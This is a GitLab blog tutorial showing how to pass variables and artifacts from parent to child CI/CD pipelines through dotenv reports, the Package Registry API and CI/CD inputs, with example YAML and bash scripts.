Variable and artifact sharing in GitLab parent-child pipelines
Software projects have different evolving needs and requirements. Some have said that _software is never finished, merely abandoned_. Some software projects are small and others are large with complex integrations. Some have dependencies on external projects, while others are self-contained. Regardless of the size and complexity, the need to validate and ensure functionality remains paramount. CI/CD pipelines can help with the challenge of building and validating software projects consistently, but, much like the software itself, these pipelines can become complex with many dependencies. This is where ideas like parent-child pipelines and data exchange in CI/CD setups become incredibly important. In this article, we will cover common CI/CD data exchange challenges users may encounter with parent-child pipelines in GitLab — and how to solve them. You'll learn how to turn complex CI/CD processes into more manageable setups. ## Using parent-child pipelines The pipeline setup in the image below illustrates a scenario where a project could require a large, complex pipeline. The whole project resides in one repository and contains different modules. Each module requires its own set of build and test automation steps. One approach to address the CI/CD configuration in a scenario like this is to break down the larger pipeline into smaller ones (i.e., child pipelines) and keep a common CI/CD process that is shared across all modules in charge of the whole orchestration (i.e., parent pipeline). The parent-child pipeline pattern allows a single pipeline to orchestrate one or many downstream pipelines. Similar to how a single pipeline coordinates the execution of multiple jobs, the parent pipeline coordinates the running of full pipelines with one or more jobs. This pattern has been shown to be helpful in a variety of use cases: * Breaking down large, complex pipelines into smaller, manageable pieces * Conditionally executing certain pipelines as part of a larger CI/CD process * Executing pipelines in parallel * Helping manage user permissions to access and run certain pipelines GitLab’s current CI/CD structure supports this pattern and makes it simple to implement parent-child pipelines. While there are many benefits when using the parent-child pipeline pattern with GitLab, one question we often get is how to share data between the parent and child pipelines. In the next sections, we’ll go over how to make use of GitLab variables and artifacts to address this concern. ### Sharing variables There are cases where it is necessary to pass the output from a parent pipeline job to a child pipeline. These outputs can be shared as variables, artifacts, and inputs. Consider a case where we create a custom variable `var_1` during the runtime of a job: stages: - build - triggers # This job only creates a variable create_var_job: stage: build script: - var_1="Hi, I'm a Parent pipeline variable" - echo "var_1=$var_1" >> var.env artifacts: reports: dotenv: var.env Notice that the variable is created as part of the script steps in the job (during runtime). In this example, we are using a simple string `"Hi, I'm a Parent pipeline variable"` to illustrate the main syntax required to later share this variable with a child pipeline. Let's break down the `create_var_job` and analyze the main steps from this GitLab job First, we need to save `var_1` as `dotenv`: script: - var_1="Hi, I'm a pipeline variable" - echo "var_1=$var_1" >> var.env After saving `var_1` as `var.env`, the next important step is to make this variable available as an artifact produced by the `create_var_job`. To do that, we use the following syntax: artifacts: reports: dotenv: var.env Up to this point, we have created a variable during runtime and saved it as a `dotenv` report. Now let's add the job that should trigger the child pipeline: telco_service_a: stage: triggers trigger: include: service_a/.gitlab-ci.yml rules: - changes: - service_a/* The goal of `telco_service_a` job is to find the `.gitlab-ci.yml` configuration of the child pipeline, which is defined in this case as `service_a,` and trigger its execution. Let's examine this job: telco_service_a: stage: triggers trigger: include: service_a/.gitlab-ci.yml We see it belongs to another `stage` of the pipeline named `triggers.`This job will run only after `create_var_job` from the first stage successfully finishes and where the variable `var_1` we want to pass is created. After defining the stage, we use the reserved words `trigger` and `include` to tell GitLab where to search for the child pipeline configuration, as illustrated in the YAML below: trigger: include: service_a/.gitlab-ci.yml Our child-pipeline YAML configuration is under `service_a/.gitlab-ci.yml` folder in the GitLab repository, for this example. <p></p> <center><i>Child pipelines folders with configurations</i></center> <p></p> Take into consideration that the repository structure depicted above can vary. What matters is properly pointing the `triggers: include` properties at the location of your child-pipeline configuration in your repository. Finally, we use `rules: changes` to indicate to GitLab that this child pipeline should be triggered only if there is any change in any file in the `service_a/.gitlab-ci.yml` directory, as illustrated in the following code snippet: rules: - changes: - service_a/* Using this rule helps to optimize cost by triggering the child pipeline job only when necessary. This approach is particularly valuable in a monorepo architecture where specific modules contain numerous components, allowing us to avoid running their dedicated pipelines when no changes have been made to their respective codebases. #### Configuring the parent pipeline Up to this point, we have put together our parent pipeline. Here's the full code snippet for this segment: # Parent Pipeline Configuration # This pipeline creates a custom variable and triggers a child pipeline stages: - build - trigger create_var_job: stage: build script: - var_1="Hi, I'm a Parent pipeline variable" - echo "var_1=$var_1" >> var.env artifacts: reports: dotenv: var.env telco_service_a: stage: triggers trigger: include: service_a/.gitlab-ci.yml rules: - changes: - service_a/* When GitLab executes the YAML configuration in the GitLab UI, the parent pipeline gets rendered as follows: Notice the label "trigger job," which indicates this job will start the execution of another pipeline configuration. #### Configuring the child pipeline Moving forward, let's now focus on the child pipeline configuration, where we expect to inherit and print the value of the `var_1` created in the parent pipeline. The pipeline configuration in `service_a/.gitlab_ci.yml` has the following definition: stages: - build build_a: stage: build script: - echo "this job inherits the variable from the Parent pipeline:" - echo $var_1 needs: - project: gitlab-da/use-cases/7-4-parent-child-pipeline job: create_var_job ref: main artifacts: true Like before, let's break down this pipeline and highlight the main parts to achieve our goal. This pipeline only contains one stage (i.e., `build)` and one job (i.e., `build_a)`. The script in the job contains two steps: build_a: stage: build script: - echo "this job inherits the variable from the Parent pipeline:" - echo $var_1 These two steps print output during the execution. The most interesting one is the second step, `echo $var_1`, where we expect to print the variable value inherited from the parent pipeline. Remember, this was a simple string with value: `"Hi, I'm a Parent pipeline variable."` #### Inheriting variables using needs To set and link this job to inherit variables from the parent pipeline, we use the reserved GitLab CI properties `needs` as depicted in the following snippet: needs: - project: gitlab-da/use-cases/7-4-parent-child-pipeline job: create_var_job ref: main artifacts: true Using the "needs" keyword, we define dependencies that must be completed before running this job. In this case, we pass four different values. Let's walk through each one of them: * **Project:** The complete namespace of the project where the main `gitlab-ci.yml` containing the parent pipeline YAML is located. Make sure to include the absolute path. * **Job:** The specific job name in the parent pipeline from where we want to inherit the variable. * **Ref:** The name of the branch where the main `gitlab-ci.yml` containing the parent pipeline YAML is located. * **Artifacts:** Where we set a boolean value, indicating that artifacts from the parent pipeline job should be downloaded and made available to this child pipeline job. **Note:** This specific approach using the needs property is only available to GitLab Premium and Ultimate users. We will cover another example for GitLab community users later on. #### Putting it all together Now let's assume we make a change to any of the files under `service_a` folder and commit the changes to the repository. When GitLab detects the change, the rule we set up will trigger the child job pipeline execution. This gets displayed in the GitLab UI as follows: Clicking on the `telco_service_a` will take us to the jobs in the child pipeline: We can see the parent-child relationship, and finally, by clicking on the `build_a job`, we can visually verify the variable inheritance in the job execution log: This output confirms the behavior we expected. The custom runtime variable `var_1` created in the parent job is inherited in the child job, unpacked from the `dotenv` report, and its value accessible as can be confirmed in Line 26 above. This use case illustrates how to share custom variables that can contain any value between pipelines. This example is intentionally simple and can be extrapolated to more realistic scenarios. Take, for instance, the following CI/CD configuration, where the custom variable we need to share is the tag of a Docker image: # Pipeline build-prod-image: tags: [ saas-linux-large-amd64 ] image: docker:20.10.16 stage: build services: - docker:20.10.16-dind script: - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY - docker build -t $PRODUCTION_IMAGE . - docker push $PRODUCTION_IMAGE - echo "UPSTREAM_CONTAINER_IMAGE=$PRODUCTION_IMAGE" >> prodimage.env artifacts: reports: dotenv: prodimage.env rules: - if: '$CI_COMMIT_BRANCH == "main"' when: always - when: never And use the variable with the Docker image tag, in another job that updates a Helm manifest file: update-helm-values: stage: update-manifests image: name: alpine:3.16 entrypoint: [""] before_script: - apk add --no-cache git curl bash yq - git remote set-url origin https://${CI_USERNAME}:${GITOPS_USER}@${SERVER_PATH}/${PROJECT_PATH} - git config --global user.email "[email protected]" - git config --global user.name "GitLab GitOps" - git pull origin main script: - cd src - echo $UPSTREAM_CONTAINER_IMAGE - yq eval -i ".spec.template.spec.containers[0].image |= \"$UPSTREAM_CONTAINER_IMAGE\"" store-deployment.yaml - cat store-deployment.yaml - git pull origin main - git checkout -B main - git commit -am '[skip ci] prod image update' - git push origin main needs: - project: gitlab-da/use-cases/devsecops-platform/simply-find/simply-find-front-end job: build-prod-image ref: main artifacts: true Mastering how to share variables between pipelines while maintaining the relationship between them enables us to create more sophisticated workflow orchestration that can meet our software building needs. ### Using GitLab Package Registry to share artifacts While the needs feature mentioned above works great for Premium and Ultimate users, GitLab also has features to help achieve similar results for Community Edition users. One suggested approach is to store artifacts in the GitLab Package Registry. Using a combination of the variables provided in GitLab CI/CD jobs and the GitLab API, you can upload artifacts to the GitLab Package Registry from a parent pipeline. In the child pipeline, you can then access the uploaded artifact from the package registry using the same variables and API to access the artifact. Let’s take a look at the example pipeline and some supplementary scripts that illustrate this: **gitlab-ci.yml (parent pipeline)** # Parent Pipeline Configuration # This pipeline creates an artifact, uploads it to Package Registry, and triggers a child pipeline stages: - create-upload - trigger variables: PACKAGE_NAME: "pipeline-artifacts" PACKAGE_VERSION: "$CI_PIPELINE_ID" ARTIFACT_FILE: "artifact.txt" # Job 1: Create and upload artifact to Package Registry create-and-upload-artifact: stage: create-upload image: alpine:latest before_script: - apk add --no-cache curl bash script: - bash scripts/create-artifact.sh - bash scripts/upload-to-registry.sh rules: - if: $CI_PIPELINE_SOURCE == "push" # Job 2: Trigger child pipeline trigger-child: stage: trigger trigger: include: child-pipeline.yml strategy: depend variables: PARENT_PIPELINE_ID: $CI_PIPELINE_ID PACKAGE_NAME: $PACKAGE_NAME PACKAGE_VERSION: $PACKAGE_VERSION ARTIFACT_FILE: $ARTIFACT_FILE rules: - if: $CI_PIPELINE_SOURCE == "push" **child-pipeline.yml** # Child Pipeline Configuration # This pipeline downloads the artifact from Package Registry and processes it stages: - download-process variables: # These variables are passed from the parent pipeline PACKAGE_NAME: "pipeline-artifacts" PACKAGE_VERSION: "$PARENT_PIPELINE_ID" ARTIFACT_FILE: "artifact.txt" # Job 1: Download and process artifact from Package Registry download-and-process-artifact: stage: download-process image: alpine:latest before_script: - apk add --no-cache curl bash script: - bash scripts/download-from-registry.sh - echo "Processing downloaded artifact..." - cat $ARTIFACT_FILE - echo "Artifact processed successfully!" **upload-to-registry.sh** #!/bin/bash set -e # Configuration PACKAGE_NAME="${PACKAGE_NAME:-pipeline-artifacts}" PACKAGE_VERSION="${PACKAGE_VERSION:-$CI_PIPELINE_ID}" ARTIFACT_FILE="${ARTIFACT_FILE:-artifact.txt}" # Validate required variables if [ -z "$CI_PROJECT_ID" ]; then echo "Error: CI_PROJECT_ID is not set" exit 1 fi if [ -z "$CI_JOB_TOKEN" ]; then echo "Error: CI_JOB_TOKEN is not set" exit 1 fi if [ -z "$CI_API_V4_URL" ]; then echo "Error: CI_API_V4_URL is not set" exit 1 fi if [ ! -f "$ARTIFACT_FILE" ]; then echo "Error: Artifact file '$ARTIFACT_FILE' not found" exit 1 fi # Construct the upload URL UPLOAD_URL="${CI_API_V4_URL}/projects/${CI_PROJECT_ID}/packages/generic/${PACKAGE_NAME}/${PACKAGE_VERSION}/${ARTIFACT_FILE}" # Upload the file using curl response=$(curl -w "%{http_code}" -o /tmp/upload_response.json \ --header "JOB-TOKEN: $CI_JOB_TOKEN" \ --upload-file "$ARTIFACT_FILE" \ "$UPLOAD_URL") if [ "$response" -eq 201 ]; then echo "Upload successful!" else echo "Upload failed with HTTP code: $response" exit 1 fi **download-from-regsitry.sh** #!/bin/bash set -e # Configuration PACKAGE_NAME="${PACKAGE_NAME:-pipeline-artifacts}" PACKAGE_VERSION="${PACKAGE_VERSION:-$PARENT_PIPELINE_ID}" ARTIFACT_FILE="${ARTIFACT_FILE:-artifact.txt}" # Validate required variables if [ -z "$CI_PROJECT_ID" ]; then echo "Error: CI_PROJECT_ID is not set" exit 1 fi if [ -z "$CI_JOB_TOKEN" ]; then echo "Error: CI_JOB_TOKEN is not set" exit 1 fi if [ -z "$CI_API_V4_URL" ]; then echo "Error: CI_API_V4_URL is not set" exit 1 fi if [ -z "$PACKAGE_VERSION" ]; then echo "Error: PACKAGE_VERSION is not set" exit 1 fi # Construct the download URL DOWNLOAD_URL="${CI_API_V4_URL}/projects/${CI_PROJECT_ID}/packages/generic/${PACKAGE_NAME}/${PACKAGE_VERSION}/${ARTIFACT_FILE}" # Download the file using curl response=$(curl -w "%{http_code}" -o "$ARTIFACT_FILE" \ --header "JOB-TOKEN: $CI_JOB_TOKEN" \ --fail-with-body \ "$DOWNLOAD_URL") if [ "$response" -eq 200 ]; then echo "Download successful!" else echo "Download failed with HTTP code: $response" exit 1 fi In this example, the parent pipeline uploads a file to the GitLab Package Registry by calling a script named `upload-to-registry.sh`. The script gives the artifact a name and version and constructs the API call to upload the file to the package registry. The parent pipeline is able to authenticate using a `$CI_JOB_TOKEN` to push the artifact.txt file to the registry. The child pipeline operates the same as the parent pipeline by using a script to construct the API call to download the artifact.txt file from the package registry. It also is able to authenticate to the registry using the `$CI_JOB_TOKEN`. Since the GitLab Package Registry is available to all GitLab users, it helps to serve as a central location for storing and versioning artifacts. It is a great option for users working with many kinds of artifacts and needing to version artifacts for workflows even beyond CI/CD. ### Using inputs to pass variables to a child pipeline If you made it this far in this tutorial, and you have plans to start creating new pipeline configurations, you might want to start by evaluating if your use case can benefit from using **inputs** to pass variables to other pipelines. Using inputs is a recommended way to pass variables when you need to define specific values in a CI/CD job and have those values remain fixed during the pipeline run. Inputs might offer certain advantages over the method we implemented before. For example, with inputs, you can include data validation through options (i.e., values must be one of these: [‘staging', ‘prod’]), variable descriptions, type checking, and assign default values before the pipeline run. #### Configuring CI/CD inputs Consider the following parent pipeline configuration: # .gitlab-ci.yml (main file) stages: - trigger trigger-staging: stage: trigger trigger: include: - local: service_a/.gitlab-ci.yml inputs: environment: staging version: "1.0.0" Let's zoom in at the main difference between the code snippet above and the previous parent pipeline examples in this tutorial: trigger: include: - local: service_a/.gitlab-ci.yml inputs: environment: staging version: "1.0.0" The main difference is using the reserved word "inputs". This part of the YAML configuration can be read in natural language as: “trigger the child pipeline defined in `service_a.gitlab-ci.yml` and make sure to pass ‘environment: staging’ and ‘version:1.0.0’ as input variables that the child pipeline will know how to use. #### Reading CI/CD inputs in child pipelines Moving to the child pipeline, it must contain in its declaration a spec that defines the inputs it can take. For each input, it is possible to add a little description, a set of predefined options the input value can take, and the type of value it will take. This is illustrated as follows: # target pipeline or child-pipeline in this case spec: inputs: environment: description: "Deployment environment" options: [staging, production] version: type: string description: "Application version" --- stages: - deploy # Jobs that will use the inputs deploy: stage: deploy script: - echo "Deploying version $[[ inputs.version ]] to $[[ inputs.environment ]]" Notice from the code snippet that after defining the spec, there is a YAML document separator "---" followed by the actual child pipeline definition where we access the variables `$[[ inputs.version ]]` and `$[[ inputs.environment ]]"` from the defined inputs using input interpolation. ## Get hands-on with parent-child pipelines, artifacts, and more We hope this article has helped with navigating the challenge of sharing variables and artifacts in parent-child pipeline setups. To try these examples for yourself, feel free to view or fork the Premium/Ultimate and the GitLab Package Registry examples of sharing artifacts. You can also sign up for a 30-day free trial of GitLab Ultimate to experience all the features GitLab has to offer. Thanks for reading!
about.gitlab.com
October 29, 2025 at 10:11 PM